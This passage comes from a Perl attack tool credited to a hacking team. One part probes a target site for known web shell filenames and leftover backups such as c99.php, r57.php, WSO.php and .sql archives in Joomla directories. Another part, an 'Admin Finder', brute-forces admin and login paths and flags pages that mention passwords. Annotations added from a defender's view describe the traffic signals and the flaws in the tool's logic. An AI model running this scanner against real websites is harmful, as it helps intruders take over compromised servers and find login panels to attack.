  3534. '/templates/beez//backup.sql',
  3535. '/templates/beez//back.sql',
  3536. '/templates/beez//data.sql',
  3537. '/templates/beez/wp.rar/',
  3538. '/templates/beez/asp.aspx',
  3539. '/templates/beez/tmp/vaga.php',
  3540. '/templates/beez/tmp/killer.php',
  3541. '/templates/beez/whmcs.php',
  3542. '/templates/beez/abuhlail.php',
  3543. '/templates/beez/tmp/killer.php',
  3544. '/templates/beez/tmp/domaine.pl',
  3545. '/templates/beez/tmp/domaine.php',
  3546. '/templates/beez/useradmin/',
  3547. '/templates/beez/tmp/d0maine.php',
  3548. '/templates/beez/d0maine.php',
  3549. '/templates/beez/tmp/sql.php',
  3550. '/templates/beez/X.php',
  3551. '/templates/beez/123.php',
  3552. '/templates/beez/m.php',
  3553. '/templates/beez/b.php',
  3554. '/templates/beez/up.php',
  3555. '/templates/beez/tmp/dz1.php',
  3556. '/templates/beez/dz1.php',
  3557. '/templates/beez/forum.zip',
  3558. '/templates/beez/Symlink.php',
  3559. '/templates/beez/Symlink.pl',
  3560. '/templates/beez/forum.rar',
  3561. '/templates/beez/joomla.zip',
  3562. '/templates/beez/joomla.rar',
  3563. '/templates/beez/wp.php',
  3564. '/templates/beez/buck.sql',
  3565. '/templates/beez/sysadmin.php',
  3566. '/templates/beez/images/c99.php',
  3567. '/templates/beez/xd.php',
  3568. '/templates/beez/c100.php',
  3569. '/templates/beez/spy.aspx',
  3570. '/templates/beez/xd.php',
  3571. '/templates/beez/tmp/xd.php',
  3572. '/templates/beez/sym/root/home/',
  3573. '/templates/beez/billing/killer.php',
  3574. '/templates/beez/tmp/upload.php',
  3575. '/templates/beez/tmp/admin.php',
  3576. '/templates/beez/Server.php',
  3577. '/templates/beez/tmp/uploads.php',
  3578. '/templates/beez/tmp/up.php',
  3579. '/templates/beez/Server/',
  3580. '/templates/beez/wp-admin/c99.php',
  3581. '/templates/beez/tmp/priv8.php',
  3582. '/templates/beez/priv8.php',
  3583. '/templates/beez/cgi.pl/',
  3584. '/templates/beez/tmp/cgi.pl',
  3585. '/templates/beez/downloads/dom.php',
  3586. '/templates/beez/webadmin.html',
  3587. '/templates/beez/admins.php',
  3588. '/templates/beez/bluff.php',
  3589. '/templates/beez/king.jeen',
  3590. '/templates/beez/admins/',
  3591. '/templates/beez/admins.asp',
  3592. '/templates/beez/admins.php',
  3593. '/templates/beez/wp.zip',
  3594. '/templates/beez/index.php','/images/WSO.php',
  3595. '/images/dz.php',
  3596. '/images/DZ.php',
  3597. '/images/cpanel.php',
  3598. '/images/cpn.php',
  3599. '/images/sos.php',
  3600. '/images/term.php',
  3601. '/images/Sec-War.php',
  3602. '/images/sql.php',
  3603. '/images/ssl.php',
  3604. '/images/mysql.php',
  3605. '/images/WolF.php',
  3606. '/images/madspot.php',
  3607. '/images/Cgishell.pl',
  3608. '/images/killer.php',
  3609. '/images/changeall.php',
  3610. '/images/2.php',
  3611. '/images/Sh3ll.php',
  3612. '/images/dz0.php',
  3613. '/images/dam.php',
  3614. '/images/user.php',
  3615. '/images/dom.php',
  3616. '/images/whmcs.php',
  3617. '/images/vb.zip',
  3618. '/images/r00t.php',
  3619. '/images/c99.php',
  3620. '/images/gaza.php',
  3621. '/images/1.php',
  3622. '/images/d0mains.php',
  3623. '/images/madspotshell.php',
  3624. '/images/info.php',
  3625. '/images/egyshell.php',
  3626. '/images/Sym.php',
  3627. '/images/c22.php',
  3628. '/images/c100.php',
  3629. '/images/configuration.php',
  3630. '/images/g.php',
  3631. '/images/xx.pl',
  3632. '/images/ls.php',
  3633. '/images/Cpanel.php',
  3634. '/images/k.php',
  3635. '/images/zone-h.php',
  3636. '/images/tmp/user.php',
  3637. '/images/tmp/Sym.php',
  3638. '/images/cp.php',
  3639. '/images/tmp/madspotshell.php',
  3640. '/images/tmp/root.php',
  3641. '/images/tmp/whmcs.php',
  3642. '/images/tmp/index.php',
  3643. '/images/tmp/2.php',
  3644. '/images/tmp/dz.php',
  3645. '/images/tmp/cpn.php',
  3646. '/images/tmp/changeall.php',
  3647. '/images/tmp/Cgishell.pl',
  3648. '/images/tmp/sql.php',
  3649. '/images/0day.php',
  3650. '/images/tmp/admin.php',
  3651. '/images/L3b.php',
  3652. '/images/d.php',
  3653. '/images/tmp/d.php',
  3654. '/images/tmp/L3b.php',
  3655. '/images/sado.php',
  3656. '/images/admin1.php',
  3657. '/images/upload.php',
  3658. '/images/up.php',
  3659. '/images/vb.zip',
  3660. '/images/vb.rar',
  3661. '/images/admin2.asp',
  3662. '/images/uploads.php',
  3663. '/images/sa.php',
  3664. '/images/sysadmins/',
  3665. '/images/admin1/',
  3666. '/images/sniper.php',
  3667. '/images/images/Sym.php',
  3668. '/images//r57.php',
  3669. '/images/gzaa_spysl',
  3670. '/images/sql-new.php',
  3671. '/images//shell.php',
  3672. '/images//sa.php',
  3673. '/images//admin.php',
  3674. '/images//sa2.php',
  3675. '/images//2.php',
  3676. '/images//gaza.php',
  3677. '/images//up.php',
  3678. '/images//upload.php',
  3679. '/images//uploads.php',
  3680. '/images/shell.php',
  3681. '/images//amad.php',
  3682. '/images//t00.php',
  3683. '/images//dz.php',
  3684. '/images//site.rar',
  3685. '/images//Black.php',
  3686. '/images//site.tar.gz',
  3687. '/images//home.zip',
  3688. '/images//home.rar',
  3689. '/images//home.tar',
  3690. '/images//home.tar.gz',
  3691. '/images//forum.zip',
  3692. '/images//forum.rar',
  3693. '/images//forum.tar',
  3694. '/images//forum.tar.gz',
  3695. '/images//test.txt',
  3696. '/images//ftp.txt',
  3697. '/images//user.txt',
  3698. '/images//site.txt',
  3699. '/images//error_log',
  3700. '/images//error',
  3701. '/images//cpanel',
  3702. '/images//awstats',
  3703. '/images//site.sql',
  3704. '/images//vb.sql',
  3705. '/images//forum.sql',
  3706. '/images/r00t-s3c.php',
  3707. '/images/c.php',
  3708. '/images//backup.sql',
  3709. '/images//back.sql',
  3710. '/images//data.sql',
  3711. '/images/wp.rar/',
  3712. '/images/asp.aspx',
  3713. '/images/tmp/vaga.php',
  3714. '/images/tmp/killer.php',
  3715. '/images/whmcs.php',
  3716. '/images/abuhlail.php',
  3717. '/images/tmp/killer.php',
  3718. '/images/tmp/domaine.pl',
  3719. '/images/tmp/domaine.php',
  3720. '/images/useradmin/',
  3721. '/images/tmp/d0maine.php',
  3722. '/images/d0maine.php',
  3723. '/images/tmp/sql.php',
  3724. '/images/X.php',
  3725. '/images/123.php',
  3726. '/images/m.php',
  3727. '/images/b.php',
  3728. '/images/up.php',
  3729. '/images/tmp/dz1.php',
  3730. '/images/dz1.php',
  3731. '/images/forum.zip',
  3732. '/images/Symlink.php',
  3733. '/images/Symlink.pl',
  3734. '/images/forum.rar',
  3735. '/images/joomla.zip',
  3736. '/images/joomla.rar',
  3737. '/images/wp.php',
  3738. '/images/buck.sql',
  3739. '/includes/WSO.php',
  3740. '/includes/dz.php',
  3741. '/includes/DZ.php',
  3742. '/includes/cpanel.php',
  3743. '/includes/cpn.php',
  3744. '/includes/sos.php',
  3745. '/includes/term.php',
  3746. '/includes/Sec-War.php',
  3747. '/includes/sql.php',
  3748. '/includes/ssl.php',
  3749. '/includes/mysql.php',
  3750. '/includes/WolF.php',
  3751. '/includes/madspot.php',
  3752. '/includes/Cgishell.pl',
  3753. '/includes/killer.php',
  3754. '/includes/changeall.php',
  3755. '/includes/2.php',
  3756. '/includes/Sh3ll.php',
  3757. '/includes/dz0.php',
  3758. '/includes/dam.php',
  3759. '/includes/user.php',
  3760. '/includes/dom.php',
  3761. '/includes/whmcs.php',
  3762. '/includes/vb.zip',
  3763. '/includes/r00t.php',
  3764. '/includes/c99.php',
  3765. '/includes/gaza.php',
  3766. '/includes/1.php',
  3767. '/includes/d0mains.php',
  3768. '/includes/madspotshell.php',
  3769. '/includes/info.php',
  3770. '/includes/egyshell.php',
  3771. '/includes/Sym.php',
  3772. '/includes/c22.php',
  3773. '/includes/c100.php',
  3774. '/includes/configuration.php',
  3775. '/includes/g.php',
  3776. '/includes/xx.pl',
  3777. '/includes/ls.php',
  3778. '/includes/Cpanel.php',
  3779. '/includes/k.php',
  3780. '/includes/zone-h.php',
  3781. '/includes/tmp/user.php',
  3782. '/includes/tmp/Sym.php',
  3783. '/includes/cp.php',
  3784. '/includes/tmp/madspotshell.php',
  3785. '/includes/tmp/root.php',
  3786. '/includes/tmp/whmcs.php',
  3787. '/includes/tmp/index.php',
  3788. '/includes/tmp/2.php',
  3789. '/includes/tmp/dz.php',
  3790. '/includes/tmp/cpn.php',
  3791. '/includes/tmp/changeall.php',
  3792. '/includes/tmp/Cgishell.pl',
  3793. '/includes/tmp/sql.php',
  3794. '/includes/0day.php',
  3795. '/includes/tmp/admin.php',
  3796. '/includes/L3b.php',
  3797. '/includes/d.php',
  3798. '/includes/tmp/d.php',
  3799. '/includes/tmp/L3b.php',
  3800. '/includes/sado.php',
  3801. '/includes/admin1.php',
  3802. '/includes/upload.php',
  3803. '/includes/up.php',
  3804. '/includes/vb.zip',
  3805. '/includes/vb.rar',
  3806. '/includes/admin2.asp',
  3807. '/includes/uploads.php',
  3808. '/includes/sa.php',
  3809. '/includes/sysadmins/',
  3810. '/includes/admin1/',
  3811. '/includes/sniper.php',
  3812. '/includes/images/Sym.php',
  3813. '/includes//r57.php',
  3814. '/includes/gzaa_spysl',
  3815. '/includes/sql-new.php',
  3816. '/includes//shell.php',
  3817. '/includes//sa.php',
  3818. '/includes//admin.php',
  3819. '/includes//sa2.php',
  3820. '/includes//2.php',
  3821. '/includes//gaza.php',
  3822. '/includes//up.php',
  3823. '/includes//upload.php',
  3824. '/includes//uploads.php',
  3825. '/includes/shell.php',
  3826. '/includes//amad.php',
  3827. '/includes//t00.php',
  3828. '/includes//dz.php',
  3829. '/includes//site.rar',
  3830. '/includes//Black.php',
  3831. '/includes//site.tar.gz',
  3832. '/includes//home.zip',
  3833. '/includes//home.rar',
  3834. '/includes//home.tar',
  3835. '/includes//home.tar.gz',
  3836. '/includes//forum.zip',
  3837. '/includes//forum.rar',
  3838. '/includes//forum.tar',
  3839. '/includes//forum.tar.gz',
  3840. '/includes//test.txt',
  3841. '/includes//ftp.txt',
  3842. '/includes//user.txt',
  3843. '/includes//site.txt',
  3844. '/includes//error_log',
  3845. '/includes//error',
  3846. '/includes//cpanel',
  3847. '/includes//awstats',
  3848. '/includes//site.sql',
  3849. '/includes//vb.sql',
  3850. '/includes//forum.sql',
  3851. '/includes/r00t-s3c.php',
  3852. '/includes/c.php',
  3853. '/includes//backup.sql',
  3854. '/includes//back.sql',
  3855. '/includes//data.sql',
  3856. '/includes/wp.rar/',
  3857. '/includes/asp.aspx',
  3858. '/includes/tmp/vaga.php',
  3859. '/includes/tmp/killer.php',
  3860. '/includes/whmcs.php',
  3861. '/includes/abuhlail.php',
  3862. '/includes/tmp/killer.php',
  3863. '/includes/tmp/domaine.pl',
  3864. '/includes/tmp/domaine.php',
  3865. '/includes/useradmin/',
  3866. '/includes/tmp/d0maine.php',
  3867. '/includes/d0maine.php',
  3868. '/includes/tmp/sql.php',
  3869. '/includes/X.php',
  3870. '/includes/123.php',
  3871. '/includes/m.php',
  3872. '/includes/b.php',
  3873. '/includes/up.php',
  3874. '/includes/tmp/dz1.php',
  3875. '/includes/dz1.php',
  3876. '/includes/forum.zip',
  3877. '/includes/Symlink.php',
  3878. '/includes/Symlink.pl',
  3879. '/includes/forum.rar',
  3880. '/includes/joomla.zip',
  3881. '/includes/joomla.rar',
  3882. '/includes/wp.php',
  3883. '/includes/buck.sql',
  3884. '/includes/sysadmin.php',
  3885. '/includes/images/c99.php',
  3886. '/includes/xd.php',
  3887. '/includes/c100.php',
  3888. '/includes/spy.aspx',
  3889. '/includes/xd.php',
  3890. '/includes/tmp/xd.php',
  3891. '/includes/sym/root/home/',
  3892. '/includes/billing/killer.php',
  3893. '/includes/tmp/upload.php',
  3894. '/includes/tmp/admin.php',
  3895. '/includes/Server.php',
  3896. '/includes/tmp/uploads.php',
  3897. '/includes/tmp/up.php',
  3898. '/includes/Server/',
  3899. '/includes/wp-admin/c99.php',
  3900. '/includes/tmp/priv8.php',
  3901. '/includes/priv8.php',
  3902. '/includes/cgi.pl/',
  3903. '/includes/tmp/cgi.pl',
  3904. '/includes/downloads/dom.php',
  3905. '/includes/webadmin.html',
  3906. '/includes/admins.php',
  3907. '/includes/bluff.php',
  3908. '/includes/king.jeen',
  3909. '/includes/admins/',
  3910. '/includes/admins.asp',
  3911. '/includes/admins.php',
  3912. '/includes/wp.zip',
  3913. '/includes/',
  3914. '/templates/rhuk_milkyway/WSO.php',
  3915. '/templates/rhuk_milkyway/dz.php',
  3916. '/templates/rhuk_milkyway/DZ.php',
  3917. '/templates/rhuk_milkyway/cpanel.php',
  3918. '/templates/rhuk_milkyway/cpn.php',
  3919. '/templates/rhuk_milkyway/sos.php',
  3920. '/templates/rhuk_milkyway/term.php',
  3921. '/templates/rhuk_milkyway/Sec-War.php',
  3922. '/templates/rhuk_milkyway/sql.php',
  3923. '/templates/rhuk_milkyway/ssl.php',
  3924. '/templates/rhuk_milkyway/mysql.php',
  3925. '/templates/rhuk_milkyway/WolF.php',
  3926. '/templates/rhuk_milkyway/madspot.php',
  3927. '/templates/rhuk_milkyway/Cgishell.pl',
  3928. '/templates/rhuk_milkyway/killer.php',
  3929. '/templates/rhuk_milkyway/changeall.php',
  3930. '/templates/rhuk_milkyway/2.php',
  3931. '/templates/rhuk_milkyway/Sh3ll.php',
  3932. '/templates/rhuk_milkyway/dz0.php',
  3933. '/templates/rhuk_milkyway/dam.php',
  3934. '/templates/rhuk_milkyway/user.php',
  3935. '/templates/rhuk_milkyway/dom.php',
  3936. '/templates/rhuk_milkyway/whmcs.php',
  3937. '/templates/rhuk_milkyway/vb.zip',
  3938. '/templates/rhuk_milkyway/r00t.php',
  3939. '/templates/rhuk_milkyway/c99.php',
  3940. '/templates/rhuk_milkyway/gaza.php',
  3941. '/templates/rhuk_milkyway/1.php',
  3942. '/templates/rhuk_milkyway/d0mains.php',
  3943. '/templates/rhuk_milkyway/madspotshell.php',
  3944. '/templates/rhuk_milkyway/info.php',
  3945. '/templates/rhuk_milkyway/egyshell.php',
  3946. '/templates/rhuk_milkyway/Sym.php',
  3947. '/templates/rhuk_milkyway/c22.php',
  3948. '/templates/rhuk_milkyway/c100.php',
  3949. '/templates/rhuk_milkyway/configuration.php',
  3950. '/templates/rhuk_milkyway/g.php',
  3951. '/templates/rhuk_milkyway/xx.pl',
  3952. '/templates/rhuk_milkyway/ls.php',
  3953. '/templates/rhuk_milkyway/Cpanel.php',
  3954. '/templates/rhuk_milkyway/k.php',
  3955. '/templates/rhuk_milkyway/zone-h.php',
  3956. '/templates/rhuk_milkyway/tmp/user.php',
  3957. '/templates/rhuk_milkyway/tmp/Sym.php',
  3958. '/templates/rhuk_milkyway/cp.php',
  3959. '/templates/rhuk_milkyway/tmp/madspotshell.php',
  3960. '/templates/rhuk_milkyway/tmp/root.php',
  3961. '/templates/rhuk_milkyway/tmp/whmcs.php',
  3962. '/templates/rhuk_milkyway/tmp/index.php',
  3963. '/templates/rhuk_milkyway/tmp/2.php',
  3964. '/templates/rhuk_milkyway/tmp/dz.php',
  3965. '/templates/rhuk_milkyway/tmp/cpn.php',
  3966. '/templates/rhuk_milkyway/tmp/changeall.php',
  3967. '/templates/rhuk_milkyway/tmp/Cgishell.pl',
  3968. '/templates/rhuk_milkyway/tmp/sql.php',
  3969. '/templates/rhuk_milkyway/0day.php',
  3970. '/templates/rhuk_milkyway/tmp/admin.php',
  3971. '/templates/rhuk_milkyway/L3b.php',
  3972. '/templates/rhuk_milkyway/d.php',
  3973. '/templates/rhuk_milkyway/tmp/d.php',
  3974. '/templates/rhuk_milkyway/tmp/L3b.php',
  3975. '/templates/rhuk_milkyway/sado.php',
  3976. '/templates/rhuk_milkyway/admin1.php',
  3977. '/templates/rhuk_milkyway/upload.php',
  3978. '/templates/rhuk_milkyway/up.php',
  3979. '/templates/rhuk_milkyway/vb.zip',
  3980. '/templates/rhuk_milkyway/vb.rar',
  3981. '/templates/rhuk_milkyway/admin2.asp',
  3982. '/templates/rhuk_milkyway/uploads.php',
  3983. '/templates/rhuk_milkyway/sa.php',
  3984. '/templates/rhuk_milkyway/sysadmins/',
  3985. '/templates/rhuk_milkyway/admin1/',
  3986. '/templates/rhuk_milkyway/sniper.php',
  3987. '/templates/rhuk_milkyway/images/Sym.php',
  3988. '/templates/rhuk_milkyway//r57.php',
  3989. '/templates/rhuk_milkyway/gzaa_spysl',
  3990. '/templates/rhuk_milkyway/sql-new.php',
  3991. '/templates/rhuk_milkyway//shell.php',
  3992. '/templates/rhuk_milkyway//sa.php',
  3993. '/templates/rhuk_milkyway//admin.php',
  3994. '/templates/rhuk_milkyway//sa2.php',
  3995. '/templates/rhuk_milkyway//2.php',
  3996. '/templates/rhuk_milkyway//gaza.php',
  3997. '/templates/rhuk_milkyway//up.php',
  3998. '/templates/rhuk_milkyway//upload.php',
  3999. '/templates/rhuk_milkyway//uploads.php',
  4000. '/templates/rhuk_milkyway/shell.php',
  4001. '/templates/rhuk_milkyway//amad.php',
  4002. '/templates/rhuk_milkyway//t00.php',
  4003. '/templates/rhuk_milkyway//dz.php',
  4004. '/templates/rhuk_milkyway//site.rar',
  4005. '/templates/rhuk_milkyway//Black.php',
  4006. '/templates/rhuk_milkyway//site.tar.gz',
  4007. '/templates/rhuk_milkyway//home.zip',
  4008. '/templates/rhuk_milkyway//home.rar',
  4009. '/templates/rhuk_milkyway//home.tar',
  4010. '/templates/rhuk_milkyway//home.tar.gz',
  4011. '/templates/rhuk_milkyway//forum.zip',
  4012. '/templates/rhuk_milkyway//forum.rar',
  4013. '/templates/rhuk_milkyway//forum.tar',
  4014. '/templates/rhuk_milkyway//forum.tar.gz',
  4015. '/templates/rhuk_milkyway//test.txt',
  4016. '/templates/rhuk_milkyway//ftp.txt',
  4017. '/templates/rhuk_milkyway//user.txt',
  4018. '/templates/rhuk_milkyway//site.txt',
  4019. '/templates/rhuk_milkyway//error_log',
  4020. '/templates/rhuk_milkyway//error',
  4021. '/templates/rhuk_milkyway//cpanel',
  4022. '/templates/rhuk_milkyway//awstats',
  4023. '/templates/rhuk_milkyway//site.sql',
  4024. '/templates/rhuk_milkyway//vb.sql',
  4025. '/templates/rhuk_milkyway//forum.sql',
  4026. '/templates/rhuk_milkyway/r00t-s3c.php',
  4027. '/templates/rhuk_milkyway/c.php',
  4028. '/templates/rhuk_milkyway//backup.sql',
  4029. '/templates/rhuk_milkyway//back.sql',
  4030. '/templates/rhuk_milkyway//data.sql',
  4031. '/templates/rhuk_milkyway/wp.rar/',
  4032. '/templates/rhuk_milkyway/asp.aspx',
  4033. '/templates/rhuk_milkyway/tmp/vaga.php',
  4034. '/templates/rhuk_milkyway/tmp/killer.php',
  4035. '/templates/rhuk_milkyway/whmcs.php',
  4036. '/templates/rhuk_milkyway/abuhlail.php',
  4037. '/templates/rhuk_milkyway/tmp/killer.php',
  4038. '/templates/rhuk_milkyway/tmp/domaine.pl',
  4039. '/templates/rhuk_milkyway/tmp/domaine.php',
  4040. '/templates/rhuk_milkyway/useradmin/',
  4041. '/templates/rhuk_milkyway/tmp/d0maine.php',
  4042. '/templates/rhuk_milkyway/d0maine.php',
  4043. '/templates/rhuk_milkyway/tmp/sql.php',
  4044. '/templates/rhuk_milkyway/X.php',
  4045. '/templates/rhuk_milkyway/123.php',
  4046. '/templates/rhuk_milkyway/m.php',
  4047. '/templates/rhuk_milkyway/b.php',
  4048. '/templates/rhuk_milkyway/up.php',
  4049. '/templates/rhuk_milkyway/tmp/dz1.php',
  4050. '/templates/rhuk_milkyway/dz1.php',
  4051. '/templates/rhuk_milkyway/forum.zip',
  4052. '/templates/rhuk_milkyway/Symlink.php',
  4053. '/templates/rhuk_milkyway/Symlink.pl',
  4054. '/templates/rhuk_milkyway/forum.rar',
  4055. '/templates/rhuk_milkyway/joomla.zip',
  4056. '/templates/rhuk_milkyway/joomla.rar',
  4057. '/templates/rhuk_milkyway/wp.php',
  4058. '/templates/rhuk_milkyway/buck.sql',
  4059. '/templates/rhuk_milkyway/sysadmin.php',
  4060. '/templates/rhuk_milkyway/images/c99.php',
  4061. '/templates/rhuk_milkyway/xd.php',
  4062. '/templates/rhuk_milkyway/c100.php',
  4063. '/templates/rhuk_milkyway/spy.aspx',
  4064. '/templates/rhuk_milkyway/xd.php',
  4065. '/templates/rhuk_milkyway/tmp/xd.php',
  4066. '/templates/rhuk_milkyway/sym/root/home/',
  4067. '/templates/rhuk_milkyway/billing/killer.php',
  4068. '/templates/rhuk_milkyway/tmp/upload.php',
  4069. '/templates/rhuk_milkyway/tmp/admin.php',
  4070. '/templates/rhuk_milkyway/Server.php',
  4071. '/templates/rhuk_milkyway/tmp/uploads.php',
  4072. '/templates/rhuk_milkyway/tmp/up.php',
  4073. '/templates/rhuk_milkyway/Server/',
  4074. '/templates/rhuk_milkyway/wp-admin/c99.php',
  4075. '/templates/rhuk_milkyway/tmp/priv8.php',
  4076. '/templates/rhuk_milkyway/priv8.php',
  4077. '/templates/rhuk_milkyway/cgi.pl/',
  4078. '/templates/rhuk_milkyway/tmp/cgi.pl',
  4079. '/templates/rhuk_milkyway/downloads/dom.php',
  4080. '/templates/rhuk_milkyway/webadmin.html',
  4081. '/templates/rhuk_milkyway/admins.php',
  4082. '/templates/rhuk_milkyway/bluff.php',
  4083. '/templates/rhuk_milkyway/king.jeen',
  4084. '/templates/rhuk_milkyway/admins/',
  4085. '/templates/rhuk_milkyway/admins.asp',
  4086. '/templates/rhuk_milkyway/admins.php',
  4087. '/templates/rhuk_milkyway/wp.zip',
  4088. '/templates/rhuk_milkyway/','WSO.php',
  4089. 'a.php',
  4090. 'z.php',
  4091. 'e.php',
  4092. 'r.php',
  4093. 't.php',
  4094. 'y.php',
  4095. 'u.php',
  4096. 'i.php',
  4097. 'o.php',
  4098. 'p.php',
  4099. 'q.php',
  4100. 's.php',
  4101. 'd.php',
  4102. 'f.php',
  4103. 'g.php',
  4104. 'h.php',
  4105. 'j.php',
  4106. 'k.php',
  4107. 'l.php',
  4108. 'm.php',
  4109. 'w.php',
  4110. 'x.php',
  4111. 'c.php',
  4112. 'v.php',
  4113. 'b.php',
  4114. 'n.php',
  4115. '1.php',
  4116. '2.php',
  4117. '3.php',
  4118. '4.php',
  4119. '5.php',
  4120. '6.php',
  4121. '7.php',
  4122. '8.php',
  4123. '9.php',
  4124. '10.php',
  4125. '12.php',
  4126. '11.php',
  4127. '1234.php',);
  4128.  
  4129.  
  4130. foreach $com(@path){
  4131.  
  4132. $url = $site.$com;
  4133. $req = HTTP::Request->new(GET=>$url);
  4134. $useragent = LWP::UserAgent->new();
  4135.  
  4136. $response = $useragent->request($req);
  4137.  
  4138. if ($response->is_success){
  4139. print "$com\n";
  4140. $url = substr($url, $com + 13);
  4141. $com = substr($url, 0, index($url, '"'));
  4142. open (txt,">>done.txt");
  4143. print txt  $com,"\n";
  4144. close(txt);
  4145. print "=> Dir Found : $url\n";
  4146. }
  4147. else {
  4148. print "=> Not Found : $com\n";
  4149. }
  4150. }}
  4151. }
  # Menu option '2' ("Admin Finder"): reads a site and a site type (asp, cfm or
  # php) from STDIN, then sends one GET per entry of a built-in list of common
  # admin/login paths and prints "Found" when the response body contains a
  # login-related keyword.
  # Defender's view: this is unauthenticated forced browsing. A run shows up in
  # access logs as a burst of sequential GETs for admin/login paths from one
  # client (presumably mostly 404s on a typical site), and because
  # LWP::UserAgent->new() is used without setting an agent, the requests carry
  # the library's default libwww-perl User-Agent. Both are usable signals for
  # log alerting, rate limiting or a WAF rule. An unguessable admin URL is not
  # a control: the panel itself needs strong authentication and, where
  # possible, network restriction.
  4152. if($targett eq '2')
  4153. {
  # 'cls' and 'title' are Windows cmd built-ins; the system() results are not checked.
  4154. system('cls');
  4155. system('title Admin Finder');
  4156.                    {
  4157.                        print " Admin Finder \n";
  # 'use' takes effect at compile time, not when this branch runs; both modules
  # are already loaded at the top of the file.
  4158. use HTTP::Request;
  4159. use LWP::UserAgent;
  4160.  
  4161. system('cls');
  4162. system('title Admin Finder Rec0ded by Fallag crx');
  4163.  
  4164. print"\n";
  4165. print "--------------------------------------------------------\n" ;
  4166. print "[*]----------Admin Finder Rec0ded by Fallag crx--------[*]\n" ;
  4167. print "[*]-------------    ReCoded By Fallag crx    ----------[*]\n" ;
  4168. print "[*]------            Fallaga  Team            ---------[*]\n" ;
  4169. print "********************************************************\n" ;
  4170. print "\n";
  4171.  
  # $site and $code are assigned without 'my', so they are package globals
  # shared with the rest of the script. Neither value is validated.
  4172. print "~# Enter The Site\n* ex: www.domaine.com ou www.domaine.com/path\n-> ";
  4173. $site=<STDIN>;
  4174. chomp $site;
  4175.  
  4176. print "\n";
  4177. print "~ Enter Type The Site \n* ex: asp, php, cfm\n-> ";
  4178. $code=<STDIN>;
  4179. chomp($code);
  4180.  
  # Prefix 'http://' unless the input already starts with 'http:'. An input
  # beginning with 'https://' does not match /^http:/ and is prefixed as well.
  4181. if ( $site !~ /^http:/ ) {
  4182. $site = 'http://' . $site;
  4183. }
  # Ensure a trailing slash so the relative paths below can be appended directly.
  4184. if ( $site !~ /\/$/ ) {
  4185. $site = $site . '/';
  4186. }
  4187. print "\n";
  4188.  
  4189. print "->Your Target: $site\n";
  4190. print "->Type Website: $code\n";
  4191. print "->Loading\n\n\n";
  4192.  
  # $code is compared case-sensitively against 'asp', 'cfm' and 'php'; any
  # other value matches no branch and nothing is requested.
  4193. if($code eq "asp"){
  4194.  
  # asp wordlist: directory names plus .asp and .html admin/login pages,
  # relative to $site. Some entries repeat (e.g. 'admin/account.asp',
  # 'admin.asp'), so those URLs are requested more than once.
  4195. @path1=('cpanel','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
  4196. 'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
  4197. 'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
  4198. 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
  4199. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
  4200. 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
  4201. 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
  4202. 'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
  4203. 'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
  4204. 'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
  4205. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html',
  4206. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
  4207. 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
  4208. 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
  4209. 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
  4210. 'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html',
  4211. 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
  4212. 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
  4213. 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html'
  4214. );
  4215.  
  # One GET per wordlist entry. A new request and a new user-agent object are
  # built on every iteration, with a 30-second timeout per request.
  4216. foreach $ways(@path1){
  4217.  
  4218. $final=$site.$ways;
  4219.  
  4220. my $req=HTTP::Request->new(GET=>$final);
  4221. my $ua=LWP::UserAgent->new();
  4222. $ua->timeout(30);
  4223. my $response=$ua->request($req);
  4224.  
  # The verdict looks only at the response body, never at the HTTP status: any
  # page that contains one of these substrings, including an error page, is
  # printed as "Found". /Sing/ is presumably a typo for "Sign" (confirm); as
  # written it also matches words such as "Single". A "Found" line is therefore
  # a keyword hit, not proof that a login page exists at that URL.
  4225. if($response->content =~ /Username/ ||
  4226. $response->content =~ /Password/ ||
  4227. $response->content =~ /username/ ||
  4228. $response->content =~ /password/ ||
  4229. $response->content =~ /USERNAME/ ||
  4230. $response->content =~ /PASSWORD/ ||
  4231. $response->content =~ /Senha/ ||
  4232. $response->content =~ /senha/ ||
  4233. $response->content =~ /Personal/ ||
  4234. $response->content =~ /Usuario/ ||
  4235. $response->content =~ /Clave/ ||
  4236. $response->content =~ /Usager/ ||
  4237. $response->content =~ /usager/ ||
  4238. $response->content =~ /Sing/ ||
  4239. $response->content =~ /passe/ ||
  4240. $response->content =~ /P\/W/ ||
  4241. $response->content =~ /Admin Password/
  4242. ){
  4243. print " \n [+] Found -> $final\n\n";
  4244. }else{
